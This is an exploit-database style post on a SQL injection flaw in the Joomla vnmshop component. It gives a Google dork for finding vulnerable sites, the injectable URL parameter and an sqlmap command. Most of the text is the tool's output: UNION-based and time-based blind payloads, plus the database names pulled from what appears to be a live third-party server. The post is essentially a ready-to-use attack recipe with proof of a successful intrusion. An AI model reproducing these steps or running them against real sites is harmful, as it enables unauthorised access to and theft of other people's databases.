<p># Exploit Title: Joomla vnmshop组件(插件)注入漏洞</p><p># Google Dork: inurl:option=com_vnmshop(61,800)</p><p># Version: all version </p><p>link vuln: site.com/index.php?option=com_vnmshop&Itemid=211&catid=78%27</p>
```
sqlmap -u "http://xxx/index.php?option=com_vnmshop&Itemid=211&catid=78*" --dbs
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:16:12
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[19:16:13] [INFO] resuming back-end DBMS 'mysql'
[19:16:13] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: http://xxx:80/index.php?option=com_vnmshop&Itemid=211&catid=78 UNION ALL SELECT CONCAT(0x71767a7671,0x48754841415165534653,0x7176767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: http://xxx:80/index.php?option=com_vnmshop&Itemid=211&catid=78 AND (SELECT * FROM (SELECT(SLEEP(5)))lnPA)
---
[19:16:14] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[19:16:14] [INFO] fetching database names
available databases [7]:
[*] information_schema
[*] sabrina_dieuhoahn
[*] sabrina_onaudio
[*] sabrina_phubinh
[*] sabrina_sonlam
[*] sabrina_thienduc
[*] sabrina_xulynuoc
```
暂无评论